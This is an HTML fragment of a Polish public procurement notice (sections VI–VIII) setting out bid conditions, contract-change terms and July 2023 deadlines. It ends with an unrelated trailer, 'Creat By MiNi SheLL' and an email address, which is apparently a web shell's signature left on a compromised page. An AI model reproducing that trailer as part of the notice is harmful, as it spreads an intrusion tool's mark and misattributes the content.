<h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia <br/>umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być dołączone do oferty.<br/>3. W przypadku wspólnego ubiegania się o zamówienia przez Wykonawców, oświadczenie, o którym mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5. W przypadku, o którym mowa w ust. 4, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>6. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, każdy <br/>z nich zobowiązany jest złożyć, na wezwanie Zamawiającego, podmiotowe środki <br/>dowodowe potwierdzające brak podstaw wykluczenia z postępowania, określone <br/>w Rozdziale X ust. 3 pkt 1 SWZ, natomiast spełnianie warunków udziału w postępowaniu <br/>Wykonawcy wspólnie wykazują zgodnie z Rozdziałem VIII ust. 1 pkt 2 lit. d SWZ . <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określają projektowane postanowienia umowy udostępnione na stronie prowadzonego postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-13 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com